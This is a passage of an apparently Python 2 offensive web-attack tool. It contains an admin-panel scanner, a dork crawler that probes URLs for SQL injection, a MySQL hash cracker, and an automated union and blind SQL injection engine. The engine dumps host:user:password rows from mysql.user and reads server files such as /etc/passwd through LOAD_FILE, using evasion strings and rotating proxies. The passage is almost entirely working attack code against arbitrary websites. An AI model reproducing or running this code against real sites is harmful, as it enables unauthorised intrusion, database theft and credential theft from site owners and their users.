md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()
4385.     if len(jerar)==0:
4386.      print "----------"
4387.      print "NOT FOUND" ;file.write( hash +'Not Found')
4388.  
4389.      print "----------"
4390.      
4391.     elif len(jerar)>2:
4392.           jerar.sort()
4393.           print ' ----------------------'
4394.           print ' LEAST POSSIBLE HASHES : ' ;file.write( 'HASH IS : '+hash + " : \nLEAST POSSIBLE HASHES:\n")
4395.           print ' ----------------------'   ;file.write( '---------------------------\n')
4396.           for a in range(int(len(jerar))-2):
4397.             print "[+] ",algorithms[jerar[a+2]]    
4398.             file.write( "[+] "+algorithms[jerar[a+2]] )
4399.             file.write('\n')
4400.     sys.exit(1)
4401. if mode == "--asp" :
4402.        site = site.replace('https://','') ;site = site.replace('http://','')
4403.        
4404.        try:
4405.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4406.           conn = httplib.HTTPConnection(site)
4407.           conn.connect()
4408.           print "\t[!] YES ^_^ ... SERVER Is Online."
4409.        except (httplib.HTTPResponse, socket.error) as Exit:
4410.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4411.            sys.exit(1)
4412.        
4413.        print("\t [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4414.        for admin in asp:
4415.             admin = admin.replace("\n","")
4416.             admin = "/" + admin
4417.             host = site + admin
4418.            
4419.             print ("\t [+] Checking " + host + "...")
4420.             connection = httplib.HTTPConnection(site)
4421.             connection.request("GET",admin)
4422.             response = connection.getresponse()
4423.             var2 = var2 + 1
4424.             if response.status == 200:
4425.                 var1 = var1 + 1
4426.                 print ( "\n\n >>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4427.                 raw_input("Press ENTER To Continue ....\n")
4428.             elif response.status == 404:
4429.                 var2 = var2
4430.             elif response.status == 302:
4431.                 print ("\n >>>" + host, "Possible Admin Panel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4432.             else:
4433.                 print (host, " Interesting Response:", response.status)
4434.             connection.close()
4435.        print("\n\n TH3  END \n")
4436.        print " Admin Panels found : " ,var1
4437.        print " Total Pages Scanned : " ,var2
4438.        sys.exit(1) 
4439. if mode == "--cfm":
4440.         site = site.replace('https://','') ;site = site.replace('http://','')
4441.         try:
4442.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4443.           conn = httplib.HTTPConnection(site)
4444.           conn.connect()
4445.           print "\t[!] YES ^_^ ... SERVER Is Online."
4446.         except (httplib.HTTPResponse, socket.error) as Exit:
4447.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4448.            sys.exit(1)
4449.            
4450.        
4451.        
4452.         print("\n [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4453.         for admin in cfm:
4454.             admin = admin.replace("\n","")
4455.             admin = "/" + admin
4456.             host = site + admin
4457.             print ("\t [+] Checking " + host + "...")
4458.             connection = httplib.HTTPConnection(site)
4459.             connection.request("GET",admin)
4460.             response = connection.getresponse()
4461.             var2 = var2 + 1
4462.             if response.status == 200:
4463.                 var1 = var1 + 1
4464.                 print ( "\n\n>>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4465.                 raw_input("Press ENTER To Continue .....\n")
4466.             elif response.status == 404:
4467.                 var2 = var2
4468.             elif response.status == 302:
4469.                 print ("\n>>>"+host,"Possible Admin Penel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4470.             else:
4471.                 print ( host," Interesting response:", response.status)
4472.             connection.close()
4473.         print("\n\n TH3  END \n")
4474.         print " Admin Panels found : " ,var1
4475.         print " Total Pages Scanned : " ,var2
4476.         sys.exit(1)
4477. if mode == "--cgi":
4478.         site = site.replace('https://','') ;site = site.replace('http://','')
4479.         try:
4480.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4481.           conn = httplib.HTTPConnection(site)
4482.           conn.connect()
4483.           print "\t[!] YES ^_^ ... SERVER Is Online."
4484.         except (httplib.HTTPResponse, socket.error) as Exit:
4485.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4486.            sys.exit(1)
4487.            
4488.        
4489.        
4490.         print("\n [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4491.         for admin in cgi:
4492.             admin = admin.replace("\n","")
4493.             admin = "/" + admin
4494.             host = site + admin
4495.             print ("\t [+] Checking " + host + "...")
4496.             connection = httplib.HTTPConnection(site)
4497.             connection.request("GET",admin)
4498.             response = connection.getresponse()
4499.             var2 = var2 + 1
4500.             if response.status == 200:
4501.                 var1 = var1 + 1
4502.                 print ( "\n\n>>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ " Admin Panel Found!")
4503.                 raw_input("Press ENTER To Continue .....\n")
4504.             elif response.status == 404:
4505.                 var2 = var2
4506.             elif response.status == 302:
4507.                 print ("\n>>>"+host,"Possible Admin Penel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4508.             else:
4509.                 print ( host," Interesting response:", response.status)
4510.             connection.close()
4511.         print("\n\n TH3  END \n")
4512.         print " Admin Panels found : " ,var1
4513.         print " Total Pages Scanned : " ,var2
4514.         sys.exit(1)
4515. if mode == "--brf":
4516.         site = site.replace('https://','') ;site = site.replace('http://','')
4517.         try:
4518.           print ("\t[+] CHECKING WEBSITE " + site + "...")
4519.           conn = httplib.HTTPConnection(site)
4520.           conn.connect()
4521.           print "\t[!] YES ^_^ ... SERVER Is Online."
4522.         except (httplib.HTTPResponse, socket.error) as Exit:
4523.            print "\t [!] Error >_< , SERVER IS Offline Or Invalid URL"
4524.            sys.exit(1)
4525.            
4526.         print("\n [+] Scanning " + site + "...\n\n") ;file.write("\t [+] Scanning " + site + "...\n\n")
4527.         for admin in brf:
4528.             admin = admin.replace("\n","")
4529.             admin = "/" + admin
4530.             host = site + admin
4531.             print ("\t [#] Checking " + host + "...")
4532.             connection = httplib.HTTPConnection(site)
4533.             connection.request("GET",admin)
4534.             response = connection.getresponse()
4535.             var2 = var2 + 1
4536.             if response.status == 200:
4537.                 var1 = var1 + 1
4538.                 print ( "\n\n>>>" + host, "Admin Panel Found!") ;file.write( "\n\n>>>" + host+ "Admin Panel Found!")
4539.                 raw_input("Press Enter To Continue ....\n")
4540.             elif response.status == 404:
4541.                 var2 = var2
4542.             elif response.status == 302:
4543.                 print ("\n>>>" + host, "Possible Admin Panel (302 - Redirect)") ;file.write( "\n\n>>>" + host+ " Possible Admin Panel (302 - Redirect)")
4544.             else:
4545.                 print (host, " Interesting Response:", response.status)
4546.             connection.close()
4547.         print("\n\n  TH3  END \n")
4548.         print " Admin Panels found : " ,var1
4549.         print " Total Pages Scanned : " ,var2
4550.         sys.exit(1)
4551. if mode == "--a":
4552.    
4553.     print " \tSCANNING "+ip+"  IS START WITH DORK  ... " ;file.write("\nSCANNING "+ip+" IS START WITH DORK .. ")
4554.     print " \t\tGET ALL LINKS : "
4555.     print " \n\t\t\tPlease wait ..."
4556.     try :
4557.        Hajar()
4558.     except (urllib2.HTTPError,socket.timeout,socket.error):
4559.          print '    Session Cancelled  !!  Check   Your internet settings '
4560.          sys.exit(1)
4561.     for reb in Muslim :
4562.       if '=' in reb :
4563.          RebelG.append(reb)
4564.     print '---------------------------------------------------------------------------' ;file.write('\n--------------------------------------------')
4565.     print '{!} Number Links Finding with  Your Dork  in Your IP Is :',len(RebelG),'(+)' ;file.write('\n This  is  All Links Finding with Your Dork')
4566.     print '---------------------------------------------------------------------------' ;file.write('\n--------------------------------------------')
4567.     while x <len(RebelG):
4568.          print '[+]',RebelG[x] ;file.write("\n[+]"+RebelG[x])
4569.          x=x+1
4570.     sys.exit(1)
4571. if mode == "--v":
4572.    
4573.    
4574.     print " \tSCANNING "+ip+"  IS START WITH DORK  ..." ;file.write("\nSCANNING "+ip+" IS START WITH DORK .. ")
4575.     print " \t\tGET JUST VULN LINKS :  "
4576.     print " \n\t\t\tPLease Wait .... "
4577.     try :
4578.        Hajar()
4579.     except (urllib2.HTTPError,socket.timeout,socket.error):
4580.          print '    Session Cancelled  !!  Check   Your internet settings '
4581.          sys.exit(1)
4582.     for reb in Muslim :
4583.       if '=' in reb :
4584.          RebelG.append(reb)
4585.          
4586.     print ' \t\t\tNumber Of All Links is >>>  ',len(RebelG)
4587.     while a<len(RebelG):
4588.       try:
4589.         print " \t\t\t\t\tScanning " ,a+1,'Link'
4590.         Test = urllib2.urlopen(RebelG[a]+"'")
4591.         source = Test.read()
4592.         if "MySQL"  in source or "mysql"  in source or "SQL"  in source or "pas de rubrique acc&eacute;ssible"  in source or "OLE DB"  in source or "Syntax error"  in source or "GetArray"  in source or "FetchRow"  in source or "string was"  in source or "VBScript"  in source or "mssql"  in source or "JET Database"  in source or "ODBC Microsoft"  in source or "oci_parse"  in source or "pg_query"  in source or "ybase_query"  in source or "ibase_query"  in source:
4593.           Y.append(RebelG[a])
4594.       except (urllib2.HTTPError,socket.timeout,urllib2.URLError):
4595.         RebelG.pop(a)
4596.       a=a+1
4597.     print '------------------------------------------------------------------------' ;file.write('\n----------------------------------------------')
4598.     print '{!} Number Links Vuln (SQLi) 100% In Your Server Is  :',len(Y),'(+)'      ;file.write('\n This is Links Vuln (SQLi) 100% In Your Server')
4599.     print '------------------------------------------------------------------------' ;file.write('\n----------------------------------------------')
4600.     while b<len(Y) :
4601.        print '[+]',Y[b] ;file.write("\n[+]"+Y[b])
4602.        b=b+1
4603.     sys.exit()
4604. if mode == "-h":
4605.     hashvalue = arg
4606.     configureCookieProcessor()
4607.     seed()
4608.     cracked = 0
4609.     cracked = crackHash (algorithm, hashvalue, hashfile)
4610.     if not cracked and googlesearch and not hashfile:
4611.         searchHash (hashvalue)
4612.     sys.exit()     
4613. if mode != "--crack" and site == "":
4614.         print "[-] URL is required!\n[-] Need Help? --help\n"
4615.         sys.exit(1)
4616. if mode == "None":
4617.         print "[-] Mode is required!\n[-] Need Help? --help\n"
4618.         sys.exit(1)
4619. if mode == "--schema" and arg_database == "None":
4620.         print "[-] Must include -D flag!\n[-] Need Help? --help\n"
4621.         sys.exit(1)
4622. if mode == "--dump":
4623.         if arg_table == "None" or arg_columns == "None":
4624.                 print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n"
4625.                 sys.exit(1)
4626. if proxy != "None":
4627.         if len(proxy.split(".")) == 2:
4628.                 proxy = open(proxy, "r").read()
4629.         if proxy.endswith("\n"):
4630.                 proxy = proxy.rstrip("\n")
4631.         proxy = proxy.split("\n")
4632. if arg_ssl == "off":
4633.         if site[:4] != "http":
4634.                 site = "http://"+site
4635. else:
4636.         if site[:5] != "https":
4637.                 site = "https://"+site
4638. if site.endswith("/*"):
4639.     site = site.rstrip('/*')
4640. if site.endswith("--"):
4641.     site = site.rstrip('--')
4642. if arg_cookie != "None":
4643.         try:
4644.                 cj = cookielib.MozillaCookieJar()
4645.                 cj.load(arg_cookie)
4646.                 cookie_handler = urllib2.HTTPCookieProcessor(cj)
4647.         except:
4648.                 print "[!] There was a problem loading your cookie file!"
4649.                 print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
4650.                 print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
4651.                 sys.exit(1)
4652. else:
4653.         cookie_handler = urllib2.HTTPCookieProcessor()
4654. if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("MECA") == -1:
4655.     print "[-] Site must contain \'MECA\'\n"
4656.     sys.exit(1)
4657. if arg_blind == "--blind" and arg_string == "":
4658.         print "[-] You must specify a --string when using blind methodology.\n"
4659.         sys.exit(1)
4660. if arg_columns != "None":
4661.         arg_columns = arg_columns.split(",")
4662. if arg_insert != "None":
4663.         arg_insert = arg_insert.split(",")
4664. if mode == "--crack" and arg_wordlist == "":
4665.         print "[-] You must specify a --wordlist to crack with.\n"
4666.         sys.exit(1)
4667. agent = random.choice(USER_AGENTS)
4668.  
4669. if mode == "--crack":
4670.         try:
4671.                 arg_wordlist = open(arg_wordlist, "r")
4672.         except(IOError):
4673.                 print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
4674.                 sys.exit(1)
4675.         if len(arg_hash) != 40 and len(arg_hash) != 16:
4676.                 print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
4677.                 sys.exit(1)
4678.         arg_wordlist = arg_wordlist.readlines()
4679.         print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
4680.         if len(arg_hash) == 40:
4681.                 print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
4682.                 try:
4683.                         import hashlib
4684.                         for word in arg_wordlist:
4685.                                 if arg_hash == c1(word):
4686.                                         print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
4687.                                         break
4688.                 except(ImportError):
4689.                         import sha
4690.                         for word in arg_wordlist:
4691.                                 if arg_hash == c2(word):
4692.                                         print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
4693.                                         break
4694.         else:
4695.                 print "[+] Detected MySQL v4 Hash:",arg_hash
4696.                 print "[+] Try MECA hash database @ "
4697.                 for word in arg_wordlist:
4698.                         word = word.rstrip("\n")
4699.                         if arg_hash == mysql323(word):
4700.                                 print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
4701.                                 break
4702.         print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
4703.         sys.exit(1)
4704.        
4705.  
4706. print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
4707. print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
4708. print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
4709. print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
4710. if site[:5] == "https":
4711.         print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
4712. else:
4713.         print "[+] SSL: No";file.write("\n[+] SSL: No")
4714. print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)
4715.        
4716.  
4717. proxy_list = [];proxy_list_count = []
4718. if proxy != "None":
4719.     print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
4720.     for p in proxy:
4721.        
4722.         try:
4723.                 match = re.findall(":",p)
4724.                 if len(match) == 3:
4725.                     arg_proxy_auth = []
4726.                     prox = p.split(":")
4727.                     arg_proxy_auth += prox
4728.                 if arg_proxy_auth != "":
4729.                     proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
4730.                     proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
4731.                     opener = urllib2.build_opener(proxy_auth_handler)
4732.                     opener.open("http://www.google.com")
4733.                     proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
4734.                     proxy_list_count.append(p);arg_proxy_auth = ""
4735.                 else:
4736.                     proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
4737.                     opener = urllib2.build_opener(proxy_handler)
4738.                     opener.open("http://www.google.com")
4739.                     proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
4740.                     proxy_list_count.append(p)
4741.                 if len(match) == 3 or len(match) == 1:
4742.                     print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
4743.                 else:
4744.                     print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
4745.         except:
4746.             print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
4747.             pass
4748.     if len(proxy_list) == 0:
4749.         print "[-] All proxies have failed. App Exiting"
4750.         sys.exit(1)
4751.     print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
4752. else:
4753.     print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
4754.     proxy_list.append(urllib2.build_opener(cookie_handler))
4755.  
4756.     proxy_list_count.append("None")
4757. proxy_num = 0
4758. proxy_len = len(proxy_list)
4759.  
4760. ## Blind String checking!
4761. if arg_blind == "--blind":
4762.         print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
4763.         head_URL = site+"+AND+1=1"
4764.         source = GetThatShit(head_URL)
4765.         match = re.findall(arg_string,source)
4766.         if len(match) >= 2:
4767.                 print "\n[-] The String you used has been found on the target page in-use more than 2 times"
4768.                 print "[-] This might lead to false positives with the blind methodology"
4769.                 print "[-] Might not mean anything.. I am just trying to help out.."
4770.                 print "[-] If you have problems you might know why.. ;-)\n"
4771.         if len(match) == 0:
4772.                 print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
4773.                 sys.exit(1)
4774.         if len(match) == 1:
4775.                 print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")
4776.                
4777.  
4778. if mode == "--findcol":
4779.         print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
4780.         print "[+] Testing: ",
4781.         file.write("\n[+] Testing: ",)
4782.         checkfor=[];nullFound=[];nullnum=[];makepretty = ""
4783.         sitenew = site+"+AND+1=2+UNION+SELECT+"
4784.         for x in xrange(1,colMax):
4785.                 try:
4786.                         sys.stdout.write("%s," % (x))
4787.                         file.write(str(x)+",")
4788.                         sys.stdout.flush()
4789.                         MECA = "dark"+str(x)+"code"
4790.                         checkfor.append(MECA)  
4791.                         if x > 1:
4792.                                 sitenew += ","
4793.                         sitenew += "0x"+MECA.encode("hex") 
4794.                         finalurl = sitenew+arg_end
4795.                         source = GetThatShit(finalurl)
4796.                         for y in checkfor:
4797.                                 colFound = re.findall(y,source)
4798.                                 if len(colFound) != 0:
4799.                                         nullFound.append(colFound[0])
4800.                         if len(nullFound) >= 1:
4801.                                 print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
4802.                                 print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
4803.                                 for z in nullFound:
4804.                                         nullcol = re.findall(("\d+"),z)
4805.                                         nullnum.append(nullcol[0])
4806.                                         sys.stdout.write("%s," % (nullcol[0]))
4807.                                         file.write(str(nullcol[0])+",")
4808.                                         sys.stdout.flush()
4809.                                 for z in xrange(0,len(checkfor)):
4810.                                         z+=1
4811.                                         if z > 1:
4812.                                                 makepretty += ","
4813.                                         makepretty += str(z)
4814.                                 site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
4815.                                 print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
4816.                                 for z in nullnum:
4817.                                         site = site.replace("+"+z+",","+MECA,")
4818.                                         site = site.replace(","+z+",",",MECA,")
4819.                                         site = site.replace(","+z+arg_end,",MECA"+arg_end)
4820.                                 print "[!] PRO_INJECTOR URL:",site;file.write("\n[!] PRO_INJECTOR URL: "+site)
4821.                                 print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
4822.                                 print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
4823.                                 print "[-] Done\n";file.write("\n[-] Done\n")
4824.                                
4825.                                 file.close();sys.exit(1)
4826.                 except (KeyboardInterrupt, SystemExit):
4827.                         raise
4828.                 except:
4829.                         pass
4830.                        
4831.         print "\n[!] Sorry Column Length could not be found."
4832.         file.write("\n[!] Sorry Column Length could not be found.")
4833.         print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
4834.         print "[-] Done\n"
4835.         sys.exit(1)
4836.  
4837.  
4838. if arg_blind != "--blind":
4839.         head_URL = site.replace("MECA","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
4840.         print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
4841.         source = GetThatShit(head_URL)
4842.         match = re.findall("\x1e\x1e\S+",source)
4843.         if len(match) >= 1:
4844.                 match = match[0][0:].split("\x1e")
4845.                 version = match[2]
4846.                 user = match[3]
4847.                 database = match[4]
4848.                 print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
4849.                 print "\tUser:", user;file.write("\tUser: "+user+"\n")
4850.                 print "\tVersion:", version;file.write("\tVersion: "+version)
4851.         else:
4852.                 print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
4853.                 sys.exit(1)
4854. else:
4855.         print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
4856.         while 1:
4857.                 config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
4858.                 source = GetThatShit(config_URL)
4859.                 match = re.findall(arg_string,source)
4860.                 if len(match) >= 1:
4861.                         print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
4862.                         version += str(ser_ver)
4863.                         break
4864.                 if ser_ver == 6:
4865.                         print "[-] Was unable to determine MySQL version.\n[-] Done"
4866.                         sys.exit(1)
4867.                 ser_ver+=1
4868.                
4869.  
4870. if mode == "--schema" or mode == "--dbs" or mode == "--full":
4871.         if version[0] == str(4):
4872.                 print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
4873.                 print "[-] -h for help"
4874.                 sys.exit(1)
4875.  
4876. if mode == "--info" and arg_blind != "--blind":
4877.         head_URL = site.replace("MECA","0x"+"MECA".encode("hex"))+"+FROM+mysql.user"+arg_end
4878.         source = GetThatShit(head_URL)
4879.         match = re.findall("MECA",source)
4880.         if len(match) >= 1:
4881.                 yesno = "YES <-- w00t w00t"
4882.         else:
4883.                 yesno = "NO"
4884.         print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
4885.         if yesno == "YES <-- w00t w00t":
4886.                 print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
4887.                 head_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
4888.                 source = GetThatShit(head_URL)
4889.                 match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
4890.                 print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
4891.                 head_URL = site.replace("MECA","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
4892.                 head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
4893.                 for x in range(0,int(userend)):
4894.                         try:
4895.                                 source = GetThatShit(head_URL.replace("NUM",str(x)))
4896.                                 match = re.findall("\x1e\x1e\S+",source)
4897.                                 match = match[0].strip("\x1e").split("\x1e")
4898.                                 if len(match) != 3:
4899.                                         nullvar = "NULL"
4900.                                         match += nullvar
4901.                                 print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
4902.                         except (KeyboardInterrupt, SystemExit):
4903.                                 raise
4904.                         except:
4905.                                 pass
4906.         else:
4907.                 print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
4908.                 file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
4909.         head_URL = site.replace("MECA","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
4910.         source = GetThatShit(head_URL)
4911.         match = re.findall("MECA",source)
4912.         if len(match) >= 1:
4913.                 yesno = "YES <-- w00t w00t"
4914.         else:
4915.                 yesno = "NO"
4916.         print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
4917.         if yesno == "YES <-- w00t w00t":
4918.                 fuzz_load = open(loadfilefuzz, "r").readlines()
4919.                 head_URL = site.replace("MECA","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
4920.                 source = GetThatShit(head_URL)
4921.                 match = re.findall("MECA",source)
4922.                 if len(match) > 1:
4923.                         onoff = "OFF <-- w00t w00t"
4924.                 else:
4925.                         onoff = "ON"       
4926.                 print "\n[+] Magic quotes are:",onoff
4927.                 yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
4928.                 if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
4929.                         print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
4930.                         print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
4931.                         for sysfile in fuzz_load:
4932.                                 sysfile = sysfile.rstrip("\n")
4933.                                 if proxy != "None":
4934.                                         sysfile = sysfile.replace("/","%2F")
4935.                                         sysfile = sysfile.replace(".","%2E")
4936.                                 if onoff == "OFF <-- w00t w00t":
4937.                                         head_URL = site.replace("MECA","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
4938.                                 else:
4939.                                         head_URL = site.replace("MECA","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
4940.                                 source = GetThatShit(head_URL)
4941.                                 match = re.findall("MECA",source)
4942.                                 if len(match) > 0:
4943.                                     print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
4944.                                     head_URL = head_URL.replace("concat(","")
4945.                                     head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
4946.                                     print "[!]",head_URL;file.write("\n[!] "+head_URL)
4947.         else:
4948.                 print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
4949.                 file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")        
4950.  
4951. if mode == "--fuzz":
4952.         fuzz_tables = open(tablefuzz, "r").readlines()
4953.         fuzz_columns = open(columnfuzz, "r").readlines()
4954.         print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
4955.         print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
4956.         print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
4957.         print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
4958.         if arg_blind == "--blind":
4959.                 fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
4960.         else:
4961.                 fuzz_URL = site.replace("MECA","0x"+"MECA".encode("hex"))+"+FROM+TABLE"+arg_end
4962.         for table in fuzz_tables:
4963.                 table = table.rstrip("\n")
4964.                 table_URL = fuzz_URL.replace("TABLE",table)
4965.                 source = GetThatShit(table_URL)
4966.                 if arg_blind == "--blind":
4967.                         match = re.findall(arg_string,source)
4968.                 else:
4969.                         match = re.findall("MECA", source);
4970.                 if len(match) > 0:
4971.                         print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
4972.                         print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
4973.                         if arg_blind == "--blind":
4974.                                 table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
4975.                         for column in fuzz_columns:
4976.                                 column = column.rstrip("\n")
4977.                                 if arg_blind == "--blind":
4978.                                         column_URL = table_URL.replace("COLUMN",column)
4979.                                 else:
4980.                                         column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
4981.                                 source = GetThatShit(column_URL)
4982.                                 if arg_blind == "--blind":
4983.                                         match = re.findall(arg_string,source)    
4984.                                 else:
4985.                                         match = re.findall("MECA",source)
4986.                                 if len(match) > 0:
4987.                                         print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
4988.                         print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
4989.  
4990. if mode == "--schema":
4991.    
4992.     if arg_database != "None" and arg_table == "None":
4993.            
4994.         if arg_blind == "--blind":
4995.                
4996.             print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
4997.             count_URL = site+"+and+((SELECT+COUNT(table_name)"
4998.             count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
4999.             line_URL = site+"+and+ascii(substring((SELECT+table_name"
5000.             line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
5001.         else:
5002.             print "[+] Showing Tables & Columns from database \""+arg_database+"\""
5003.             file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
